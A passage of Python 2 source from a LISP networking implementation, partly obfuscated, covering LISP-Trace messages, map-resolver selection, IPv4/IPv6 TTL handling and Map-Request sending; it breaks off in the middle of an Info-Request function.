        """Log this trace's JSON records."""
        iIIIOOOO0 = self.packet_json
        lprint("LISP-Trace JSON: '{}'".format(iIIIOOOO0))
        if 38 - 38: IiII / Ii1I % II111iiii
        if 56 - 56: ooOoO0o - OoooooooOO - i11iIiiIii

    def encode(self):
        """Build the on-wire message: a 32-bit type word 0x90000000 (in
        network order), a 32-bit zero word, the 64-bit nonce, then the
        JSON text. NOTE(review): Python 2 only -- struct.pack() output
        and json.dumps() text are both 'str' and concatenate directly.
        """
        ooo0OOoo = socket.htonl(0x90000000)
        IIii1i = struct.pack("II", ooo0OOoo, 0)
        IIii1i += struct.pack("Q", self.nonce)
        IIii1i += json.dumps(self.packet_json)
        return(IIii1i)
        if 27 - 27: Ii1I . OoOoOO00 % oO0o % o0oOOo0O0Ooo / i11iIiiIii - iIii1I11I1II1
        if 77 - 77: o0oOOo0O0Ooo . OoOoOO00 % Ii1I

    def decode(self, packet):
        """Parse an on-wire LISP-Trace message into this object.

        Validates the 0x90 type byte, extracts local RLOC (second
        32-bit word as dotted quad) and local port (low 16 bits of the
        first word), then the nonce and optional trailing JSON.
        Returns True on success, False on any parse failure.
        """
        O00oO00oOO00O = "I"
        ooOoooOoo0oO = struct.calcsize(O00oO00oOO00O)
        if (len(packet) < ooOoooOoo0oO): return(False)
        ooo0OOoo = struct.unpack(O00oO00oOO00O, packet[:ooOoooOoo0oO])[0]
        packet = packet[ooOoooOoo0oO::]
        ooo0OOoo = socket.ntohl(ooo0OOoo)
        # High byte must be 0x90 (LISP-Trace message type).
        if ((ooo0OOoo & 0xff000000) != 0x90000000): return(False)
        if 94 - 94: I11i / IiII - OoOoOO00 % OoO0O00 % i11iIiiIii . Ii1I
        if (len(packet) < ooOoooOoo0oO): return(False)
        IiiIIi1 = struct.unpack(O00oO00oOO00O, packet[:ooOoooOoo0oO])[0]
        packet = packet[ooOoooOoo0oO::]
        if 26 - 26: i1IIi - Ii1I * I1IiiI
        # Second word carries the local RLOC as four dotted-quad bytes.
        IiiIIi1 = socket.ntohl(IiiIIi1)
        OO0O0o0Oo0o0 = IiiIIi1 >> 24
        ii1IIi11II1i = (IiiIIi1 >> 16) & 0xff
        OOooO = (IiiIIi1 >> 8) & 0xff
        Ii1II111i1 = IiiIIi1 & 0xff
        self.local_rloc = "{}.{}.{}.{}".format(OO0O0o0Oo0o0, ii1IIi11II1i,
            OOooO, Ii1II111i1)
        # Low 16 bits of the first word carry the local port.
        self.local_port = str(ooo0OOoo & 0xffff)
        if 95 - 95: i11iIiiIii / I1IiiI + OOooOOo / I1ii11iIi11i
        O00oO00oOO00O = "Q"
        ooOoooOoo0oO = struct.calcsize(O00oO00oOO00O)
        if (len(packet) < ooOoooOoo0oO): return(False)
        self.nonce = struct.unpack(O00oO00oOO00O, packet[:ooOoooOoo0oO])[0]
        packet = packet[ooOoooOoo0oO::]
        # An empty JSON payload is valid (initial trace request).
        if (len(packet) == 0): return(True)
        if 10 - 10: IiII + o0oOOo0O0Ooo + I11i % O0 % I1Ii111
        try:
            self.packet_json = json.loads(packet)
        except:
            return(False)
        if 85 - 85: O0 % OoOoOO00 . I1ii11iIi11i
        return(True)
        if 46 - 46: OOooOOo * iIii1I11I1II1
        if 33 - 33: OoO0O00 * II111iiii / i1IIi

    def myeid(self, eid):
        """Return True when 'eid' is one of this system's EIDs."""
        return(lisp_is_myeid(eid))
        if 93 - 93: I1Ii111 % I11i
        if 64 - 64: I1IiiI % OoOoOO00 / Oo0Ooo

    def return_to_sender(self, lisp_socket, rts_rloc, packet):
        """Send 'packet' back to the trace originator at 'rts_rloc'
        ("addr:port"), preferring a NAT-translated address cached via
        rtr_cache_nat_trace(). Uses 'lisp_socket' when supplied, else a
        temporary UDP socket bound to the LISP-Trace port."""
        oOo00O, IiI1iI1 = self.rtr_cache_nat_trace_find(rts_rloc)
        if (oOo00O == None):
            oOo00O, IiI1iI1 = rts_rloc.split(":")
            IiI1iI1 = int(IiI1iI1)
            lprint("Send LISP-Trace to address {}:{}".format(oOo00O, IiI1iI1))
        else:
            lprint("Send LISP-Trace to translated address {}:{}".format(oOo00O,
                IiI1iI1))
        if 40 - 40: Ii1I + iIii1I11I1II1 / oO0o . II111iiii % O0 - IiII
        if 49 - 49: IiII - OOooOOo * OOooOOo . O0
        if (lisp_socket == None):
            IiII1iiI = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
            IiII1iiI.bind(("0.0.0.0", LISP_TRACE_PORT))
            IiII1iiI.sendto(packet, (oOo00O, IiI1iI1))
            IiII1iiI.close()
        else:
            lisp_socket.sendto(packet, (oOo00O, IiI1iI1))
        if 60 - 60: OoOoOO00 % iIii1I11I1II1 + IiII % o0oOOo0O0Ooo
        if 64 - 64: OoOoOO00 * I1ii11iIi11i . OoooooooOO . i1IIi
        if 61 - 61: OoO0O00

    def packet_length(self):
        """Encoded message length: 8 (presumably the UDP header -- TODO
        confirm) + 4+4+8 fixed header + the JSON text length."""
        o0oOo00 = 8; o0oo0Oo = 4 + 4 + 8
        return(o0oOo00 + o0oo0Oo + len(json.dumps(self.packet_json)))
        if 55 - 55: OoO0O00 . Oo0Ooo + iII111i % OoO0O00 * O0
        if 37 - 37: OOooOOo

    def rtr_cache_nat_trace(self, translated_rloc, translated_port):
        """RTR side: remember the originator's NAT-translated address,
        keyed by the "local_rloc:local_port" the trace arrived on."""
        ii1i1I1111ii = self.local_rloc + ":" + self.local_port
        i11II = (translated_rloc, translated_port)
        lisp_rtr_nat_trace_cache[ii1i1I1111ii] = i11II
        lprint("Cache NAT Trace addresses {} -> {}".format(ii1i1I1111ii, i11II))
        if 100 - 100: Oo0Ooo * I1IiiI . ooOoO0o
        if 53 - 53: OOooOOo + o0oOOo0O0Ooo * Ii1I + O0

    def rtr_cache_nat_trace_find(self, local_rloc_and_port):
        """Return the cached (translated_rloc, translated_port) for a
        "local_rloc:port" key, or (None, None) when not cached."""
        ii1i1I1111ii = local_rloc_and_port
        try: i11II = lisp_rtr_nat_trace_cache[ii1i1I1111ii]
        except: i11II = (None, None)
        return(i11II)
if 75 - 75: OoooooooOO
if 24 - 24: I1Ii111 % i11iIiiIii % oO0o . OOooOOo % IiII
if 23 - 23: o0oOOo0O0Ooo * II111iiii - Oo0Ooo - I1IiiI
if 86 - 86: I1IiiI - II111iiii * II111iiii * oO0o % OoooooooOO * OoOoOO00
if 93 - 93: I1IiiI + OoO0O00 % O0 - ooOoO0o * i1IIi
if 60 - 60: I1IiiI
if 9 - 9: I11i % i1IIi / ooOoO0o % iII111i - oO0o - II111iiii
if 29 - 29: ooOoO0o . II111iiii . i1IIi % oO0o
if 11 - 11: OoOoOO00 . OoO0O00 % I11i * iII111i % I1Ii111 . O0
if 17 - 17: OOooOOo / i11iIiiIii - i11iIiiIii . II111iiii . ooOoO0o
if 38 - 38: OOooOOo . OoooooooOO . II111iiii + OoO0O00 / oO0o . OoooooooOO
def lisp_get_map_server(address):
    """Return the configured map-server whose address is an exact match
    for 'address', or None when no such map-server exists."""
    matches = (ms for ms in lisp_map_servers_list.values() if
        ms.map_server.is_exact_match(address))
    return(next(matches, None))
def lisp_get_any_map_server():
    """Return an arbitrary configured map-server (the first one in the
    table's iteration order), or None when none are configured."""
    return(next(iter(lisp_map_servers_list.values()), None))
def lisp_get_map_resolver(address, eid):
    """Select a map-resolver.

    When 'address' is given, return the map-resolver whose table key
    contains the printed address (the last matching entry wins), or
    None. Otherwise select by mr-name: eid == "" means "any resolver",
    eid == None means name "all", else the mr-name comes from the
    database-mapping for 'eid'. Among candidates with that mr-name the
    least recently used resolver is returned.
    """
    if (address != None):
        addr_str = address.print_address()
        found = None
        for key in lisp_map_resolvers_list:
            if (key.find(addr_str) == -1): continue
            found = lisp_map_resolvers_list[key]
        return(found)

    #
    # Map the eid argument onto the mr-name to select on.
    #
    if (eid == ""):
        mr_name = ""
    elif (eid == None):
        mr_name = "all"
    else:
        db = lisp_db_for_lookups.lookup_cache(eid, False)
        mr_name = "all" if db == None else db.use_mr_name

    #
    # Round-robin by picking the least-recently-used matching resolver.
    #
    lru = None
    for mr in lisp_map_resolvers_list.values():
        if (mr_name == ""): return(mr)
        if (mr.mr_name != mr_name): continue
        if (lru == None or mr.last_used < lru.last_used): lru = mr
    return(lru)
def lisp_get_decent_map_resolver(eid):
    """LISP-Decent pull mode: hash 'eid' to an index, form the DNS name
    "<index>.<suffix>", and return the least recently used map-resolver
    configured with that dns-name (None when there is none)."""
    index = lisp_get_decent_index(eid)
    dns_name = str(index) + "." + lisp_decent_dns_suffix

    lprint("Use LISP-Decent map-resolver {} for EID {}".format(
        bold(dns_name, False), eid.print_prefix()))

    #
    # Least-recently-used among resolvers carrying this dns-name.
    #
    lru = None
    for mr in lisp_map_resolvers_list.values():
        if (dns_name != mr.dns_name): continue
        if (lru == None or mr.last_used < lru.last_used): lru = mr
    return(lru)
def lisp_ipv4_input(packet):
    """Validate an IPv4 packet (a Python 2 byte-string) before LISP
    encapsulation.

    Returns [True, packet] for IGMP packets (protocol 2, handed back
    for group-membership processing), [False, None] when the packet
    must be discarded (bad checksum or TTL 0/1), or [False, packet]
    with the TTL decremented and the header checksum recomputed.
    """
    if 98 - 98: I1ii11iIi11i % I1IiiI
    if 9 - 9: o0oOOo0O0Ooo / I1Ii111 % i1IIi - OOooOOo % I1IiiI / I1ii11iIi11i
    if 66 - 66: IiII
    if 56 - 56: oO0o + OoooooooOO
    # Protocol byte at offset 9; 2 is IGMP. (Py2: packet[9] is a char.)
    if (ord(packet[9]) == 2): return([True, packet])
    if 75 - 75: O0 % Ii1I
    if 47 - 47: OoooooooOO - OoooooooOO + OoO0O00 / iIii1I11I1II1
    if 23 - 23: iII111i / iIii1I11I1II1
    if 5 - 5: O0
    # Header checksum at offset 10-11. A checksum of 0 is tolerated
    # (sender did not fill it in); otherwise recompute -- a valid
    # header folds to 0 in the checksum field after lisp_ip_checksum().
    Oo0 = struct.unpack("H", packet[10:12])[0]
    if (Oo0 == 0):
        dprint("Packet arrived with checksum of 0!")
    else:
        packet = lisp_ip_checksum(packet)
        Oo0 = struct.unpack("H", packet[10:12])[0]
        if (Oo0 != 0):
            dprint("IPv4 header checksum failed for inner header")
            packet = lisp_format_packet(packet[0:20])
            dprint("Packet header: {}".format(packet))
            return([False, None])
    if 64 - 64: i1IIi * i1IIi . iII111i - O0 - oO0o % OoooooooOO
    if 14 - 14: Ii1I % OoO0O00 % I1Ii111 * O0
    if 8 - 8: I1IiiI - i11iIiiIii * I1IiiI
    if 6 - 6: O0 - OoOoOO00 - i11iIiiIii / iII111i
    if 63 - 63: OOooOOo
    if 84 - 84: i11iIiiIii * iIii1I11I1II1 % I11i % iII111i + OoooooooOO . o0oOOo0O0Ooo
    if 78 - 78: o0oOOo0O0Ooo . iII111i + O0 / I1ii11iIi11i + I1ii11iIi11i + II111iiii
    # TTL at offset 8: discard on 0 (should never arrive) or 1 (would
    # expire here), otherwise decrement.
    oo0o = struct.unpack("B", packet[8:9])[0]
    if (oo0o == 0):
        dprint("IPv4 packet arrived with ttl 0, packet discarded")
        return([False, None])
    elif (oo0o == 1):
        dprint("IPv4 packet {}, packet discarded".format(bold("ttl expiry",
            False)))
        if 96 - 96: iIii1I11I1II1 * II111iiii . iIii1I11I1II1
        return([False, None])
    if 13 - 13: Ii1I - OoOoOO00 . Ii1I
    if 7 - 7: Ii1I - I11i / I1ii11iIi11i + iII111i
    # Rewrite TTL (offset 8), zero the checksum field (offsets 10-11),
    # then recompute the header checksum over the new header.
    oo0o -= 1
    packet = packet[0:8] + struct.pack("B", oo0o) + packet[9::]
    packet = packet[0:10] + struct.pack("H", 0) + packet[12::]
    packet = lisp_ip_checksum(packet)
    return([False, packet])
if 47 - 47: I11i * IiII / oO0o - OoooooooOO . OoooooooOO / I11i
if 73 - 73: Ii1I . IiII % IiII
if 56 - 56: I1Ii111 + iII111i + iII111i
if 99 - 99: o0oOOo0O0Ooo % I1ii11iIi11i / Oo0Ooo . O0 + OoO0O00 * OoOoOO00
if 48 - 48: iIii1I11I1II1 + O0 * I11i * i11iIiiIii . Ii1I / i1IIi
if 48 - 48: i1IIi % iIii1I11I1II1 + I1IiiI - OoOoOO00 % I11i . I1Ii111
if 66 - 66: I1Ii111 * i11iIiiIii + I1IiiI % II111iiii
def lisp_ipv6_input(packet):
    """Validate an IPv6 packet before LISP encapsulation.

    'packet' is a lisp_packet whose .packet is the raw IPv6 packet and
    whose .inner_dest is the destination address object. Returns the
    raw packet with its hop-limit decremented, or None when the packet
    must be discarded (hop-limit 0/1 or a link-local destination).
    """
    inner_dest = packet.inner_dest
    raw = packet.packet

    #
    # Hop-limit byte at offset 7: 0 should never arrive, 1 would expire
    # on this hop.
    #
    hop_limit = struct.unpack("B", raw[7:8])[0]
    if (hop_limit == 0):
        dprint("IPv6 packet arrived with hop-limit 0, packet discarded")
        return(None)
    if (hop_limit == 1):
        dprint("IPv6 packet {}, packet discarded".format(bold("ttl expiry",
            False)))
        return(None)

    #
    # Link-local destinations are never encapsulated.
    #
    if (inner_dest.is_ipv6_link_local()):
        dprint("Do not encapsulate IPv6 link-local packets")
        return(None)

    #
    # Rewrite the hop-limit byte in place.
    #
    hop_limit -= 1
    return(raw[0:7] + struct.pack("B", hop_limit) + raw[8::])
def lisp_mac_input(packet):
    """MAC frames need no header rewriting (no TTL/hop-limit) before
    encapsulation; hand the frame back unchanged."""
    return packet
def lisp_rate_limit_map_request(source, dest):
    """Return True when a Map-Request for source->dest should be
    suppressed because the last one went out less than
    LISP_MAP_REQUEST_RATE_LIMIT seconds ago; False otherwise (including
    when no Map-Request has ever been sent)."""
    if (lisp_last_map_request_sent == None): return(False)

    elapsed = lisp_get_timestamp() - lisp_last_map_request_sent
    rate_limited = (elapsed < LISP_MAP_REQUEST_RATE_LIMIT)

    if (rate_limited):
        if (source != None): source = source.print_address()
        dest = dest.print_address()
        dprint("Rate-limiting Map-Request for {} -> {}".format(source, dest))
    return(rate_limited)
def lisp_send_map_request(lisp_sockets, lisp_ephem_port, seid, deid, rloc):
    """Build and send a Map-Request for EID 'deid' sourced from 'seid'.

    When 'rloc' is non-None this is an RLOC-probe, sent directly to the
    RLOC (NAT-encapsulated when the RLOC is translated). Otherwise the
    request is wrapped in an ECM and sent to a selected map-resolver,
    and lisp_last_map_request_sent is updated for rate-limiting.
    """
    global lisp_last_map_request_sent
    if 43 - 43: O0 + I11i % II111iiii
    if 56 - 56: IiII + Oo0Ooo . IiII % iIii1I11I1II1 % ooOoO0o % ooOoO0o
    if 70 - 70: ooOoO0o / i1IIi - I11i - i11iIiiIii
    if 79 - 79: OoO0O00 - OoooooooOO % iII111i . O0
    if 93 - 93: I1Ii111
    if 3 - 3: OoO0O00 / IiII - oO0o / oO0o
    # RLOC-probe case: destination is the probed RLOC. An RTR probes to
    # the NAT-translated port, an xTR to the LISP data port.
    iiIiiI1 = oo0OooOOo0oO = None
    if (rloc):
        iiIiiI1 = rloc.rloc
        oo0OooOOo0oO = rloc.translated_port if lisp_i_am_rtr else LISP_DATA_PORT
    if 48 - 48: O0
    if 99 - 99: II111iiii * oO0o / I1ii11iIi11i - i1IIi
    if 84 - 84: i11iIiiIii . OoooooooOO
    if 69 - 69: I1Ii111 * II111iiii % I1Ii111 * i11iIiiIii . ooOoO0o / Oo0Ooo
    if 5 - 5: Ii1I
    # Our local (IPv4, IPv6, device) RLOCs for the ITR-RLOCs list.
    iIIIIiiII, i1IiIii, OoO0o0OOOO = lisp_myrlocs
    if (iIIIIiiII == None):
        lprint("Suppress sending Map-Request, IPv4 RLOC not found")
        return
    if 77 - 77: OoooooooOO / II111iiii + Ii1I * o0oOOo0O0Ooo . i11iIiiIii
    if (i1IiIii == None and iiIiiI1 != None and iiIiiI1.is_ipv6()):
        lprint("Suppress sending Map-Request, IPv6 RLOC not found")
        return
    if 24 - 24: I11i + OoO0O00
    if 76 - 76: II111iiii - O0 / Oo0Ooo % OoOoOO00
    o00oo00OOOO = lisp_map_request()
    o00oo00OOOO.record_count = 1
    o00oo00OOOO.nonce = lisp_get_control_nonce()
    o00oo00OOOO.rloc_probe = (iiIiiI1 != None)
    if 1 - 1: I1ii11iIi11i / iIii1I11I1II1 . Oo0Ooo + I1IiiI / Oo0Ooo
    if 62 - 62: oO0o * OoOoOO00 % iII111i * ooOoO0o . Oo0Ooo . i11iIiiIii
    if 60 - 60: iIii1I11I1II1 + O0
    if 96 - 96: iII111i . i1IIi % o0oOOo0O0Ooo * iIii1I11I1II1 - iII111i - OoooooooOO
    if 13 - 13: i1IIi
    if 68 - 68: I1ii11iIi11i . IiII + O0 % i1IIi + iIii1I11I1II1
    if 17 - 17: i1IIi - OOooOOo * ooOoO0o + i1IIi - ooOoO0o + I1ii11iIi11i
    # Remember the probe nonce so the matching Map-Reply can be paired.
    if (rloc): rloc.last_rloc_probe_nonce = o00oo00OOOO.nonce
    if 28 - 28: iII111i
    # Multicast EIDs carry (source, group) in (target_eid, target_group).
    iiI1 = deid.is_multicast_address()
    if (iiI1):
        o00oo00OOOO.target_eid = seid
        o00oo00OOOO.target_group = deid
    else:
        o00oo00OOOO.target_eid = deid
    if 18 - 18: I1Ii111
    if 29 - 29: i1IIi - I1IiiI / i1IIi
    if 64 - 64: IiII
    if 69 - 69: OOooOOo . I1IiiI
    if 11 - 11: I1Ii111 * I1IiiI - I1Ii111 / iII111i
    if 22 - 22: iII111i % I11i % O0 - I11i
    if 71 - 71: I1Ii111 / II111iiii - OoooooooOO % i1IIi + OoOoOO00 % OoooooooOO
    if 52 - 52: Ii1I . OoOoOO00 / o0oOOo0O0Ooo / iII111i
    if 83 - 83: OoO0O00 - Oo0Ooo + I1Ii111 . I1IiiI
    # Sign non-probe Map-Requests when a signature-EID is configured.
    if (o00oo00OOOO.rloc_probe == False):
        Ooooo00 = lisp_get_signature_eid()
        if (Ooooo00):
            o00oo00OOOO.signature_eid.copy_address(Ooooo00.eid)
            o00oo00OOOO.privkey_filename = "./lisp-sig.pem"
    if 78 - 78: I11i / ooOoO0o . OoOoOO00 * i1IIi
    if 15 - 15: i1IIi . II111iiii * OoOoOO00 / Oo0Ooo
    if 99 - 99: iII111i - o0oOOo0O0Ooo / O0
    if 97 - 97: iIii1I11I1II1 * I1Ii111
    if 39 - 39: I1Ii111 . II111iiii
    if 94 - 94: OoO0O00 - OoO0O00 + iIii1I11I1II1 + O0 * oO0o
    if (seid == None or iiI1):
        o00oo00OOOO.source_eid.afi = LISP_AFI_NONE
    else:
        o00oo00OOOO.source_eid = seid
    if 9 - 9: Ii1I * Oo0Ooo / oO0o / Ii1I
    if 34 - 34: I1IiiI
    if 56 - 56: Ii1I
    if 71 - 71: O0 / i1IIi
    if 20 - 20: OOooOOo . iIii1I11I1II1 - I1Ii111 . i1IIi
    if 82 - 82: oO0o * i11iIiiIii % o0oOOo0O0Ooo % IiII - I11i - OoO0O00
    if 24 - 24: oO0o . II111iiii + OoO0O00 * I1ii11iIi11i / oO0o
    if 86 - 86: I1Ii111 + I1ii11iIi11i
    if 63 - 63: ooOoO0o - i11iIiiIii . o0oOOo0O0Ooo - i1IIi - IiII
    if 32 - 32: I1Ii111 / iIii1I11I1II1 + oO0o % I11i * OoooooooOO
    if 69 - 69: OOooOOo
    if 9 - 9: i11iIiiIii * Oo0Ooo
    # NAT traversal (xTR only): probe from the translated RLOC unless
    # the probed address is private (same site, no NAT in the path).
    if (iiIiiI1 != None and lisp_nat_traversal and lisp_i_am_rtr == False):
        if (iiIiiI1.is_private_address() == False):
            iIIIIiiII = lisp_get_any_translated_rloc()
        if 33 - 33: oO0o / ooOoO0o
        if (iIIIIiiII == None):
            lprint("Suppress sending Map-Request, translated RLOC not found")
            return
    if 92 - 92: O0 . Oo0Ooo - Ii1I * I1IiiI * Oo0Ooo * iII111i
    if 78 - 78: Ii1I * iIii1I11I1II1 - Ii1I - I1ii11iIi11i * I1ii11iIi11i
    if 44 - 44: o0oOOo0O0Ooo
    if 1 - 1: OoooooooOO / i11iIiiIii . o0oOOo0O0Ooo
    if 78 - 78: OOooOOo * O0 * II111iiii % OoOoOO00
    if 12 - 12: Oo0Ooo . o0oOOo0O0Ooo - i1IIi - oO0o % IiII . I11i
    if 17 - 17: i1IIi % OoO0O00 + i11iIiiIii % I1Ii111 * ooOoO0o . I1ii11iIi11i
    if 64 - 64: O0 - iII111i
    # Fill in itr-rlocs: IPv4 (NAT-translated when applicable), then
    # IPv6 unless it is only link-local.
    if (iiIiiI1 == None or iiIiiI1.is_ipv4()):
        if (lisp_nat_traversal and iiIiiI1 == None):
            oOoOO0oOo0O0O00 = lisp_get_any_translated_rloc()
            if (oOoOO0oOo0O0O00 != None): iIIIIiiII = oOoOO0oOo0O0O00
        if 84 - 84: OOooOOo * ooOoO0o / O0
        o00oo00OOOO.itr_rlocs.append(iIIIIiiII)
    if 96 - 96: I11i . I11i % II111iiii
    if (iiIiiI1 == None or iiIiiI1.is_ipv6()):
        if (i1IiIii == None or i1IiIii.is_ipv6_link_local()):
            i1IiIii = None
        else:
            o00oo00OOOO.itr_rloc_count = 1 if (iiIiiI1 == None) else 0
            o00oo00OOOO.itr_rlocs.append(i1IiIii)
    if 14 - 14: iII111i / OoooooooOO
    if 8 - 8: OOooOOo + I1IiiI - Oo0Ooo + i1IIi . Ii1I . I1Ii111
    if 38 - 38: I1IiiI / II111iiii * OoOoOO00 / I1Ii111
    if 80 - 80: I1ii11iIi11i / ooOoO0o * ooOoO0o . Oo0Ooo
    if 44 - 44: Ii1I * i1IIi % OoOoOO00 . OoOoOO00
    if 16 - 16: Oo0Ooo / i1IIi / iIii1I11I1II1 / iIii1I11I1II1 % o0oOOo0O0Ooo / I1ii11iIi11i
    if 11 - 11: I1IiiI
    if 45 - 45: OOooOOo / i1IIi * IiII * I1Ii111
    if 34 - 34: ooOoO0o / iIii1I11I1II1 . iII111i
    # Choose the address used as inner source for the probe/ECM.
    if (iiIiiI1 != None and o00oo00OOOO.itr_rlocs != []):
        oO00o0o0O = o00oo00OOOO.itr_rlocs[0]
    else:
        if (deid.is_ipv4()):
            oO00o0o0O = iIIIIiiII
        elif (deid.is_ipv6()):
            oO00o0o0O = i1IiIii
        else:
            oO00o0o0O = iIIIIiiII
    if 91 - 91: OoO0O00
    if 8 - 8: oO0o
    if 96 - 96: IiII
    if 37 - 37: Ii1I % i11iIiiIii + iIii1I11I1II1 % Oo0Ooo - iIii1I11I1II1
    if 26 - 26: o0oOOo0O0Ooo . i1IIi
    if 62 - 62: IiII * I1ii11iIi11i % iIii1I11I1II1 / II111iiii - OoO0O00
    IIii1i = o00oo00OOOO.encode(iiIiiI1, oo0OooOOo0oO)
    o00oo00OOOO.print_map_request()
    if 52 - 52: iII111i . I11i - I11i + oO0o + iIii1I11I1II1
    if 83 - 83: I11i * iIii1I11I1II1 + OoOoOO00
    if 81 - 81: ooOoO0o * OOooOOo / OoO0O00 + I1ii11iIi11i % I1Ii111
    if 37 - 37: i11iIiiIii - OoooooooOO - OoOoOO00 * oO0o / Ii1I
    if 100 - 100: II111iiii / Oo0Ooo / iII111i / OOooOOo
    if 100 - 100: iIii1I11I1II1
    # RLOC-probe: send directly (NAT-encapsulated when the RLOC is
    # translated) and return -- no map-resolver involved.
    if (iiIiiI1 != None):
        if (rloc.is_rloc_translated()):
            O00OOoOOO0O0O = lisp_get_nat_info(iiIiiI1, rloc.rloc_name)
            if 50 - 50: I1Ii111 / ooOoO0o * I11i
            if 53 - 53: II111iiii . IiII
            if 5 - 5: i1IIi % IiII
            if 16 - 16: ooOoO0o - iII111i % Ii1I . OoOoOO00
            # No NAT state yet -- synthesize it from the gleaned
            # RLOC/port so the probe can be encapsulated.
            if (O00OOoOOO0O0O == None):
                i11iII1IiI = rloc.rloc.print_address_no_iid()
                i11ii = "gleaned-{}".format(i11iII1IiI)
                III1I1Iii1 = rloc.translated_port
                O00OOoOOO0O0O = lisp_nat_info(i11iII1IiI, i11ii, III1I1Iii1)
            if 56 - 56: i11iIiiIii % i11iIiiIii % OoooooooOO . Ii1I . iII111i + I11i
            lisp_encapsulate_rloc_probe(lisp_sockets, iiIiiI1, O00OOoOOO0O0O,
                IIii1i)
            return
        if 64 - 64: O0
        if 37 - 37: o0oOOo0O0Ooo / O0
        oo0o00OO = iiIiiI1.print_address_no_iid()
        oO0o0 = lisp_convert_4to6(oo0o00OO)
        lisp_send(lisp_sockets, oO0o0, LISP_CTRL_PORT, IIii1i)
        return
    if 58 - 58: I1Ii111 + OoooooooOO + iIii1I11I1II1
    if 13 - 13: o0oOOo0O0Ooo . I11i / O0
    if 39 - 39: I11i + oO0o + ooOoO0o % ooOoO0o - I1IiiI % Oo0Ooo
    if 9 - 9: IiII / iII111i * II111iiii + O0 % Oo0Ooo / i1IIi
    if 45 - 45: OoOoOO00 % i11iIiiIii . I1IiiI - O0 * i1IIi - I1IiiI
    if 48 - 48: IiII / iIii1I11I1II1
    # Pick a map-resolver: LISP-Decent hashes the EID to a DNS name,
    # otherwise select by the source-EID's mr-name (xTRs only).
    iIi1i = None if lisp_i_am_rtr else seid
    if (lisp_decent_pull_xtr_configured()):
        O0o00000o0O = lisp_get_decent_map_resolver(deid)
    else:
        O0o00000o0O = lisp_get_map_resolver(None, iIi1i)
    if 5 - 5: OoOoOO00 . iIii1I11I1II1 + iII111i
    if (O0o00000o0O == None):
        lprint("Cannot find Map-Resolver for source-EID {}".format(green(
            seid.print_address(), False)))
        if 63 - 63: i1IIi
        return
    if 24 - 24: i11iIiiIii % iII111i . oO0o
    O0o00000o0O.last_used = lisp_get_timestamp()
    O0o00000o0O.map_requests_sent += 1
    if (O0o00000o0O.last_nonce == 0): O0o00000o0O.last_nonce = o00oo00OOOO.nonce
    if 44 - 44: II111iiii - OoO0O00 + i11iIiiIii
    if 34 - 34: I1ii11iIi11i % ooOoO0o / II111iiii * O0 % OOooOOo
    if 9 - 9: I1ii11iIi11i / I1ii11iIi11i - OOooOOo . iIii1I11I1II1
    if 33 - 33: I1IiiI + oO0o % I1IiiI / iII111i - ooOoO0o - i11iIiiIii
    # The ECM needs a source; default to the chosen ITR-RLOC.
    if (seid == None): seid = oO00o0o0O
    lisp_send_ecm(lisp_sockets, IIii1i, seid, lisp_ephem_port, deid,
        O0o00000o0O.map_resolver)
    if 39 - 39: i11iIiiIii / oO0o
    if 71 - 71: I1Ii111 * iIii1I11I1II1 - I1Ii111
    if 87 - 87: I1IiiI / Ii1I
    if 54 - 54: OoooooooOO / Ii1I
    # Record send time for Map-Request rate-limiting.
    lisp_last_map_request_sent = lisp_get_timestamp()
    if 26 - 26: o0oOOo0O0Ooo + OoO0O00
    if 59 - 59: Ii1I * IiII
    if 64 - 64: ooOoO0o . Oo0Ooo - OoOoOO00
    if 66 - 66: OoOoOO00
    O0o00000o0O.resolve_dns_name()
    return
if 83 - 83: OOooOOo . IiII
if 98 - 98: i11iIiiIii
if 74 - 74: iIii1I11I1II1 * O0 + OOooOOo . o0oOOo0O0Ooo
if 17 - 17: I1Ii111
if 59 - 59: OoOoOO00 . OoOoOO00 * iII111i - Ii1I . i11iIiiIii
if 68 - 68: iII111i
if 68 - 68: I1Ii111 - OoO0O00 % OoO0O00 % OOooOOo - OoO0O00
if 3 - 3: iIii1I11I1II1 + iIii1I11I1II1 + OoO0O00
def lisp_send_info_request(lisp_sockets, dest, port, device_name):
    """Build and send an Info-Request to 'dest' -- a map-server on the
    control port or an RTR on the data port -- to learn our NAT
    translation.

    When 'device_name' is supplied, a host route to 'dest' is
    temporarily pinned through that device's default-route next-hop so
    the request leaves the intended interface; the previous route is
    restored before returning.
    """
    if 59 - 59: iII111i
    if 7 - 7: o0oOOo0O0Ooo * OoooooooOO - Ii1I * II111iiii % I1Ii111
    if 82 - 82: OoOoOO00 - OoOoOO00 + iIii1I11I1II1 + o0oOOo0O0Ooo + IiII - o0oOOo0O0Ooo
    if 65 - 65: I1Ii111 + OOooOOo
    OO0O0OOooo = lisp_info()
    OO0O0OOooo.nonce = lisp_get_control_nonce()
    # Per-interface requests are distinguished by a hostname suffix.
    if (device_name): OO0O0OOooo.hostname += "-" + device_name
    if 19 - 19: ooOoO0o
    oo0o00OO = dest.print_address_no_iid()
    if 53 - 53: O0 - ooOoO0o * I11i - oO0o / i1IIi % Ii1I
    if 100 - 100: i11iIiiIii / o0oOOo0O0Ooo
    if 72 - 72: I1IiiI
    if 90 - 90: ooOoO0o
    if 67 - 67: iIii1I11I1II1 + i1IIi * I1IiiI * OoooooooOO
    if 23 - 23: IiII
    if 32 - 32: OoOoOO00 - iII111i % oO0o / I1ii11iIi11i - o0oOOo0O0Ooo
    if 52 - 52: Ii1I / OoooooooOO % i11iIiiIii + iII111i
    if 59 - 59: Ii1I / o0oOOo0O0Ooo / oO0o + iII111i * I1ii11iIi11i - o0oOOo0O0Ooo
    if 70 - 70: O0 / I1ii11iIi11i + ooOoO0o . OoO0O00 - OoO0O00 / i11iIiiIii
    if 1 - 1: iIii1I11I1II1 % I1ii11iIi11i
    if 49 - 49: iII111i + o0oOOo0O0Ooo % I1ii11iIi11i . O0 % OoooooooOO . o0oOOo0O0Ooo
    if 3 - 3: i11iIiiIii - i1IIi * o0oOOo0O0Ooo / OoOoOO00 % Oo0Ooo
    if 65 - 65: OoooooooOO + iII111i - i11iIiiIii - IiII + oO0o
    if 67 - 67: i1IIi * I1Ii111 * O0
    if 16 - 16: OoO0O00 + iII111i + i1IIi + I1ii11iIi11i - I1IiiI
    OOO0OOoo0o = False
    if (device_name):
        OOo000oo = lisp_get_host_route_next_hop(oo0o00OO)
        if 91 - 91: I1ii11iIi11i % OoOoOO00
        if 63 - 63: iIii1I11I1II1 + OoOoOO00 - I11i
        if 10 - 10: I1ii11iIi11i
